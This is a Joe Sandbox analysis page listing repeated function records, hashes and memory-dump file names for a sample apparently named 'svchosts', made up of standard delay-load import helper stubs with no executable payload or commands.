___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a5adf479c082e22d793de0db7795db5b34863d78ad7eabf77883771f969a4c0c
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: a5adf479c082e22d793de0db7795db5b34863d78ad7eabf77883771f969a4c0c
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8db8d965bfc03adbc5d921ea4b6fcc1eb1b3f95e7417c9861029ae0b858097ff
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 8db8d965bfc03adbc5d921ea4b6fcc1eb1b3f95e7417c9861029ae0b858097ff
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c0726064a366fea7bb25f1f9520afd85dae7936a6d19ef4c9e8027b259cdf7f
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 0c0726064a366fea7bb25f1f9520afd85dae7936a6d19ef4c9e8027b259cdf7f
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 65bc9aec5f1256012d9e9820a5597e076d81ca7f928f419fe960ae0afa7f1dbb
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 65bc9aec5f1256012d9e9820a5597e076d81ca7f928f419fe960ae0afa7f1dbb
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: efea650962e7386ff27a7e9310320323adc95abfb688f6190e0682462bbaebe9
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: efea650962e7386ff27a7e9310320323adc95abfb688f6190e0682462bbaebe9
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b94147654dc32a450ee44e93b62fa0668e3068c6cc2082e9b420de413b7016d
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 4b94147654dc32a450ee44e93b62fa0668e3068c6cc2082e9b420de413b7016d
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40499b0f4564810ed868838a850ffb1cc35161343248b33b21a6892b7167f9df
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 40499b0f4564810ed868838a850ffb1cc35161343248b33b21a6892b7167f9df
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 465f218a18c27d3fd34d4358690c8939f744224ee506c6e54c70e13c0ef5db83
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 465f218a18c27d3fd34d4358690c8939f744224ee506c6e54c70e13c0ef5db83
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 77b375624f840b0b801d4afcd74751b0fea7878bea7c3c8cfba29d2405cf1175
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 77b375624f840b0b801d4afcd74751b0fea7878bea7c3c8cfba29d2405cf1175
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002AD997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32f57690684302a0d8346bbbbf2eda97a6077f3393794f2df00be91ca7f1ac6f
Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
Opcode Fuzzy Hash: 32f57690684302a0d8346bbbbf2eda97a6077f3393794f2df00be91ca7f1ac6f
Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831

Function 002ADAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2020236786280523d9931576c08e31008c77f38e81e8fd431a2c965cd5daa1a
Instruction ID: 8a057630c0eb9b44c7818ab4d6050e379fa8dfd471e85a0a6823009fa291b97d
Opcode Fuzzy Hash: d2020236786280523d9931576c08e31008c77f38e81e8fd431a2c965cd5daa1a
Instruction Fuzzy Hash: 77A011AA2BC0823E3008B202AC03E3B022CC0C2B22330820EF00BE088AAC8008280830

Function 002ADAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 49d450b84cd2d46058b7be698d27896aae507f2832f142f8fa813dc7d5910cb4
Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
Opcode Fuzzy Hash: 49d450b84cd2d46058b7be698d27896aae507f2832f142f8fa813dc7d5910cb4
Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831

Function 002ADAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f09820306c6b67b18b73491de1eddd05a15784b2dc445134353a3bde0930addf
Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
Opcode Fuzzy Hash: f09820306c6b67b18b73491de1eddd05a15784b2dc445134353a3bde0930addf
Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831

Function 002ADAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0f462d6df2454098c4f4103bab42037b192b0b43d8df18df846ebac661cf8fa9
Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
Opcode Fuzzy Hash: 0f462d6df2454098c4f4103bab42037b192b0b43d8df18df846ebac661cf8fa9
Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831

Function 002ADACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: daa73b29d495d91178b226180a95cea0d16644524a0733616e29a1472094c090
Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
Opcode Fuzzy Hash: daa73b29d495d91178b226180a95cea0d16644524a0733616e29a1472094c090
Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831

Function 002ADAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2fe133799f5b2a7c3e631c673d923533f078e944432b02a4cb2b418d05978866
Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
Opcode Fuzzy Hash: 2fe133799f5b2a7c3e631c673d923533f078e944432b02a4cb2b418d05978866
Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831

Function 002ADBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 93878a05b2789f3683d721ab910b5480ea794353db2069c7cecca3c2cf5fcfbd
Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
Opcode Fuzzy Hash: 93878a05b2789f3683d721ab910b5480ea794353db2069c7cecca3c2cf5fcfbd
Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830

